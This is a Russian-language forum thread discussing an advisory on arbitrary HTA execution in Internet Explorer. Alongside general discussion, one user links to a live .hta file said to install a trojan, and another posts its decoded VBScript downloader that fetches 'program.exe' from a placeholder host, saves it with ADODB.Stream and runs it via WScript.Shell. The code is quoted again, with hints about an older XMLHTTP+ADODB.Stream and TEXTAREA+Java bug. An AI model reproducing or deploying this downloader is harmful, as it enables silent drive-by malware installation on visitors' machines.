Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Выполнение произвольных HTA файлов в Microsoft Internet Explorer
 
Обсуждение статьи Выполнение произвольных HTA файлов в Microsoft Internet Explorer
 
У меня вопрос, а это что за файлик такой?! :(
 
HTA = HyperText Aplication. Специятельные HTML-файлики, которые выглядят и крякают как приложения.
 
А можно поподробнее об HTA, как они работают и какова их структура (можно ссылочку)
 
Это HTML файлы с скриптами, работающие в зоне безопасности MyComputer.
Например так
 
Как всегда, дырка есть, заплатка неизвестно когда будет... Как OpenSource - сначала заплатка, потом дырка, как M$... слов нет
 
Может порсто перестают поддерживать IE6? Типа перходите на 7, а следовательно платите денежки и переходите на новые системы. Ибо бабло рулит в Microsoft
 
На порно сайтах уже давно этот баг применяют,типо заходиш на сайт и сразу запускается троян,=),Только не понятно почему сплоит не выложили?=).
А решения проблемы переход на Опера последней версии релиза.
 
C0de_eviL   покаж хоть один сайт с таким эксплоитом
 
Во-во Opera рулит!!!
 
Хм мне такую штуковину в архивчике ещё в прошлом году прислали. не знаю как оно через веб, но локально если запускать загружало троянчик "programm.exe".

Вот выложил смотрите кому интерестно что такое hta ;)

http://aksp.ho.com.ua/happy.hta
 
Вот немного изменённые декодированые внутринности вышеприведённого файла ;)

пользователь смотрит картинку а в это время уже запускается программка ;)

< i m g s r c = h t t p : / / w w w .you site.ru/img . j p g > < s c r i p t l a n g u a g e = v b s c r i p t > s e t o = C r e a t e O b j e c t ( " m s x m l 2 . X M L H T T P " ) o . o p e n " G E T " , " h t t p : / / you_site. ru /horse / p r o g r a m . e x e " , F a l s e o . s e n d s e t s = c r e a t e o b j e c t ( " a d o d b . s t r e a m " ) s . t y p e = 1 s . o p e n s . w r i t e o . r e s p o n s e B o d y s . s a v e t o f i l e " p r o g r a m . e x e " , 2 S e t w s = C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) w s . R u n " p r o g r a m . e x e " , 3 , F A L S E < / s c r i p t >
 
не катит.Ошибка на странице.
 
Цитата
< i m g s r c = h t t p : / / w w w .you site.ru/img . j p g > < s c r i p t l a n g u a g e = v b s c r i p t > s e t o = C r e a t e O b j e c t ( " m s x m l 2 . X M L H T T P " ) o . o p e n " G E T " , " h t t p : / / you_site. ru /horse / p r o g r a m . e x e " , F a l s e o . s e n d s e t s = c r e a t e o b j e c t ( "  ~~~~ a d o d b . s t r e a m " ) s . t y p e = 1 s . o p e n s . w r i t e o . r e s p o n s e B o d y s . s a v e t o f i l e " p r o g r a m . e x e " , 2 S e t w s = C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) w s . R u n " p r o g r a m . e x e " , 3 , F A L S E < / s c r i p t >
a eto pos win xp sp1, win xp sp2 budet rabotat'

X M L H T T P + a d o d b . s t r e a m --- eto ochen' stariy bag, i est' v ispolnenii TEXTAREA+JAVA kotorii perezapisivaet wmplayer.exe + location.href="mms://" and RUN IT.
Страницы: 1
Читают тему